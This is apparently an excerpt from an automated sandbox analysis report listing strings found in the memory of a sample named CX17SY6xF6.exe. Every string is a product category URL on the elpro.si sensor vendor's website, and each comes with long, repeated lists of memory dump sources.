CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/upogibni-nosilci-strizni-nosilci/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/temperat
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/cryo-temp-temperaturna-tipala-za-z
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/digital-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/dodatna-oprema-za-temperaturna-tip
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/ex-temperaturna-tipala-z-atex-cert
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/field-mounted-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/high-temp-temperaturna-tipala-za-v
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/tempe
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/kanalska-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/mims-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/nastavljiva-temperaturna-tipala-2/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/on-site-cal-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/povrsinska-temperaturna-tipala/
